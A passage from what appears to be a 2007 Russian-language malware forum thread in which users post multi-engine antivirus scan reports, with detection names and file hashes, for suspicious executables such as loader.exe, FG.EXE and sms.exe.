eSafe 7.0.15.0 2007.07.24 -
eTrust-Vet 31.1.5004 2007.07.25 HTML/Mallar
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 Virus:HTML/Allaple.A
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 HTML/Instancob.A
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -

Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d

[V_Bond]

AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 Win32:Spyware-gen.
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 Application.Cool.Remote.Control.1.2
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5084 2007.07.26 -
Microsoft 1.2704 2007.07.26 RemoteAccess:Win32/CoolRemoteControl
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 Generic Malware
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Webwasher-Gateway 6.5.3 2007.07.26 -
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4

[Winsent]

File 1.scr received on 07.27.2007 16:12:33 (CET)


Antivirus Version Last Update Result

AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.27 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.27 -
AVG 7.5.0.476 2007.07.27 -
BitDefender 7.2 2007.07.27 Trojan.PWS.LDPinch.TAW
CAT-QuickHeal 9.00 2007.07.26 (Suspicious) - DNAScan
ClamAV 0.91 2007.07.27 -
DrWeb 4.33 2007.07.27 -
eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -
Fortinet 2.91.0.0 2007.07.27 -
F-Prot 4.3.2.48 2007.07.27 -
F-Secure 6.70.13030.0 2007.07.27 Packed.Win32.PolyCrypt.b
Ikarus T3.1.1.8 2007.07.27 Trojan-Downloader.Win32.Small.cyn
Kaspersky 4.0.2.24 2007.07.27 Packed.Win32.PolyCrypt.b
McAfee 5084 2007.07.26 -
Microsoft 1.2704 2007.07.27 Trojan:Win32/Anomaly.gen!A
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.27 -
Rising 19.33.42.00 2007.07.27 Packer.RyCrypt
Sophos 4.19.0 2007.07.26 Mal/Basine-C
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
VBA32 3.12.2.1 2007.07.27 -
VirusBuster 4.3.26:9 2007.07.27 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.27 Trojan.Crypt.XPACK.Gen
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f

[drongo]

T-11377

Код:

 File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.27	-
AntiVir	7.4.0.50	2007.07.27	HEUR/Crypted
Authentium	4.93.8	2007.07.27	Possibly a new variant of W32/Threat-HLLSI-based!Maximus
Avast	4.7.997.0	2007.07.27	-
AVG	7.5.0.476	2007.07.27	PSW.Generic5.KY
BitDefender	7.2	2007.07.27	Trojan.PWS.Goldun.SYT
CAT-QuickHeal	9.00	2007.07.26	-
ClamAV	0.91	2007.07.27	-
DrWeb	4.33	2007.07.27	Trojan.PWS.GoldSpy
eSafe	7.0.15.0	2007.07.24	suspicious Trojan/Worm
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.27	-
Fortinet	2.91.0.0	2007.07.27	Dowdec!tr
F-Prot	4.3.2.48	2007.07.27	W32/Threat-HLLSI-based!Maximus
F-Secure	6.70.13030.0	2007.07.27	Trojan-Spy.Win32.Goldun.pc
Ikarus	T3.1.1.8	2007.07.27	Trojan-PWS.Goldun.SYT
Kaspersky	4.0.2.24	2007.07.27	Trojan-Spy.Win32.Goldun.pc
McAfee	5084	2007.07.26	-
Microsoft	1.2704	2007.07.27	-
NOD32v2	2425	2007.07.27	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.27	Dialer.KMO
Rising	19.33.42.00	2007.07.27	-
Sophos	4.19.0	2007.07.26	Troj/Dowdec-Gen
Sunbelt	2.2.907.0	2007.07.26	VIPRE.Suspicious
Symantec	10	2007.07.27	-
TheHacker	6.1.7.155	2007.07.27	-
VBA32	3.12.2.1	2007.07.27	suspected of Downloader.Small.33
VirusBuster	4.3.26:9	2007.07.27	-
Webwasher-Gateway	6.0.1	2007.07.27	Heuristic.Crypted
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

[Синауридзе Александр]

File loader.exe received on 07.28.2007 14:59:45 (CET)

Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD
AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ
BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.28 -
DrWeb 4.33 2007.07.28 DLOADER.Trojan
eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm
eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A
Ewido 4.0 2007.07.28 -
FileAdvisor 1 2007.07.28 -
Fortinet 2.91.0.0 2007.07.28 Heuri.E
F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus
F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz
Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc
Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.28 -
NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus
Norman 5.80.02 2007.07.27 W32/Downloader
Panda 9.0.0.4 2007.07.28 Generic Malware
Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab
Sophos 4.19.0 2007.07.26 Mal/Heuri-E
Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz
Symantec 10 2007.07.28 -
TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz
VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz
VirusBuster 4.3.26:9 2007.07.27 -
Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz

Additional information
File size: 1020 bytes
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0

[ISO]

File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: Loading ... finished
Loading server information...
Compact
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.30 -
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
BitDefender 7.2 2007.07.30 -
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.30 -
DrWeb 4.33 2007.07.30 -
eSafe 7.0.15.0 2007.07.29 suspicious Trojan/Worm
eTrust-Vet 31.1.5010 2007.07.28 -
Ewido 4.0 2007.07.29 -
FileAdvisor 1 2007.07.30 -
Fortinet 2.91.0.0 2007.07.30 -
F-Prot 4.3.2.48 2007.07.27 -
F-Secure 6.70.13030.0 2007.07.30 -
Ikarus T3.1.1.8 2007.07.29 Backdoor.Win32.Delf.apa
Kaspersky 4.0.2.24 2007.07.30 -
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.30 -
NOD32v2 2428 2007.07.30 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.29 -
Rising 19.34.00.00 2007.07.30 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.28 -
Symantec 10 2007.07.30 -
TheHacker 6.1.7.158 2007.07.30 -
VBA32 3.12.2.1 2007.07.30 -
VirusBuster 4.3.26:9 2007.07.29 -
Webwasher-Gateway 6.0.1 2007.07.30 Win32.ModifiedUPX.gen!90 (suspicious)
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
packers: UPX
packers: UPX

[Winsent]

File sms.exe received on 07.31.2007 07:49:38 (CET)


Antivirus Version Last Update Result

AhnLab-V3 2007.7.31.1 2007.07.31 -
AntiVir 7.4.0.54 2007.07.30 HEUR/Crypted
Authentium 4.93.8 2007.07.30 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
BitDefender 7.2 2007.07.31 Trojan.PWS.LDPinch.TAW
CAT-QuickHeal 9.00 2007.07.30 -
ClamAV 0.91 2007.07.31 -
DrWeb 4.33 2007.07.31 -
eSafe 7.0.15.0 2007.07.29 -
eTrust-Vet 31.1.5018 2007.07.31 -
Ewido 4.0 2007.07.30 -
FileAdvisor 1 2007.07.31 -
Fortinet 2.91.0.0 2007.07.31 -
F-Prot 4.3.2.48 2007.07.30 -
F-Secure 6.70.13030.0 2007.07.31 -
Ikarus T3.1.1.8 2007.07.31 -
Kaspersky 4.0.2.24 2007.07.31 -
McAfee 5086 2007.07.30 New Malware.ek
Microsoft 1.2704 2007.07.30 -
NOD32v2 2429 2007.07.30 -
Norman 5.80.02 2007.07.30 Suspicious_P.gen
Panda 9.0.0.4 2007.07.31 -
Prevx1 V2 2007.07.31 -
Rising 19.34.11.00 2007.07.31 -
Sophos 4.19.0 2007.07.26 Mal/Basine-C
Sunbelt 2.2.907.0 2007.07.31 VIPRE.Suspicious
Symantec 10 2007.07.31 -
TheHacker 6.1.7.159 2007.07.31 -
VBA32 3.12.2.2 2007.07.30 -
VirusBuster 4.3.26:9 2007.07.30 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.31 Heuristic.Crypted